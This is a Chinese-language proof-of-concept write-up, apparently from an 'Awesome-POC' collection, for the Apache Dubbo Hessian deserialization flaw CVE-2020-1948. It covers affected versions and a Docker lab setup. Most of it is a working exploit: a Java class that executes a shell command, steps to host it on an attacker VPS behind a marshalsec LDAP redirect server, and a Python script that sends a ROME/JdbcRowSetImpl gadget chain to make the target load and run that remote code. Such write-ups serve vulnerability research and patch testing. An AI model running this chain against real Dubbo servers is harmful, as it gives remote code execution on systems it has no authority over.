Awesome-POC/开发框架漏洞/Apache Dubbo Hessian 反序列化漏洞 CVE-2020-1948.md

# Apache Dubbo Hessian 反序列化漏洞 CVE-2020-1948

## 漏洞描述

Apache Dubbo 是一款高性能 Java RPC 框架。漏洞存在于 Apache Dubbo 默认使用的反序列化工具 hessian 中，攻击者可能会通过发送恶意 RPC 请求来触发漏洞，这类 RPC 请求中通常会带有无法识别的服务名或方法名，以及一些恶意的参数负载。当恶意参数被反序列化时，达到代码执行的目的。

要想利用该漏洞需要满足以下条件：

- Dubbo 服务端应用引入了 `com.rometools:rome:1.7.0` 或 `com.caucho:quercus:4.0.45` 等不安全的 rome、quercus 等第三方类库版本。
- JDK 版本低于 `7u201` 或者低于 `8u191`（存在 RMI 或者 LDAP 这种 JNDI 注入方式），JDK 相关 RCE 漏洞利用方式及受影响的版本：
    - 通过 RMI 协议加载远程 RMI Registry 上的恶意对象，受影响的 JDK 版本：低于 `6u45` 或者低于 `7u21`。
    - RMI + JNDI 注入，受影响的 JDK 版本：低于 `6u132`、低于 `7u122` 或低于 `8u113`。
    - LDAP + JNDI 注入，受影响的 JDK 版本：低于 `6u211`、低于 `7u201`、低于 8u191 或 `11u1`。

参考链接：

- https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html
- https://hub.docker.com/r/dsolab/dubbo

## 漏洞影响

```
Apache Dubbo 2.7.0 to 2.7.6
Apache Dubbo 2.6.0 to 2.6.7
Apache Dubbo all 2.5.x versions（已不再更新维护）
```

准确地说，也影响了 2.7.7 和 2.6.8 版本，因为修复方案被绕过。

## 环境搭建

docker-compose.yaml

```
version: "3"

services:
  api:
    build: .
    image: dsolab/dubbo:cve-2020-1948
    container_name: cve-2020-1948
    ports:
      - "12345:12345"
```

执行如下命令启动一个 Apache Dubbo 2.7.7 版本的服务器：

```
docker-compose up -d
```

服务启动后，监听在 `your-ip:12345` 端口。

## 漏洞复现

准备 exp.java，编译：

```java
import javax.naming.spi.ObjectFactory;
import javax.naming.Name;
import javax.naming.Context;
import java.util.Hashtable;
import java.io.IOException;

public class exp implements ObjectFactory {
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) {
        try {
            Runtime.getRuntime().exec("touch /tmp/success");
        } catch (IOException e) {
            e.printStackTrace();
        }
        return null;
    }
}
```

```
javac exp.java
```

vps 开启 web 服务，托管编译后的 exp.class：

```
http://your-vps-ip/exp.class
```

启动 LDAP 服务，监听端口为 9999：

```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip/#exp 9999
```

本地构建测试脚本 poc.py：

```shell
# -*- coding: utf-8 -*-

import sys

from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient

if len(sys.argv) < 4:
  print('Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL'.format(sys.argv[0]))
  print('\nExample:\n\n- python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp'.format(sys.argv[0]))
  sys.exit()

client = DubboClient(sys.argv[1], int(sys.argv[2]))

JdbcRowSetImpl=new_object(
  'com.sun.rowset.JdbcRowSetImpl',
  dataSource=sys.argv[3],
  strMatchColumns=["foo"]
  )
JdbcRowSetImplClass=new_object(
  'java.lang.Class',
  name="com.sun.rowset.JdbcRowSetImpl",
  )
toStringBean=new_object(
  'com.rometools.rome.feed.impl.ToStringBean',
  beanClass=JdbcRowSetImplClass,
  obj=JdbcRowSetImpl
  )

resp = client.send_request_and_return_response(
  service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
  # 此处可以是 $invoke、$invokeSync、$echo 等，通杀 2.7.7 及 CVE 公布的所有版本
  method_name='$invoke',
  args=[toStringBean])

output = str(resp)
if 'Fail to decode request due to: RpcInvocation' in output:
  print('[!] Target maybe not support deserialization.')
elif 'EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString()' in output:
   print('[+] Succeed.')
else:
  print('[!] Output:')
  print(output)
  print('[!] Target maybe not use dubbo-remoting library.')
```

运行测试脚本：

```
python poc.py your-ip 12345 ldap://your-vps-ip:9999/exp
```

![](images/Apache%20Dubbo%20Hessian%20反序列化漏洞%20CVE-2020-1948/image-20250612142204566.png)

可以看到，LDAP 代理成功接收请求，并将请求转发到 vps：

```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.8.0.1/\#exp 9999
Listening on 0.0.0.0:9999
Send LDAP reference result for exp redirecting to http://10.8.0.1/exp.class
```

![](images/Apache%20Dubbo%20Hessian%20反序列化漏洞%20CVE-2020-1948/image-20250612142258289.png)

![](images/Apache%20Dubbo%20Hessian%20反序列化漏洞%20CVE-2020-1948/image-20250612142323434.png)

命令被成功执行：

![](images/Apache%20Dubbo%20Hessian%20反序列化漏洞%20CVE-2020-1948/image-20250612142426975.png)

## 漏洞修复

升级至最新版本。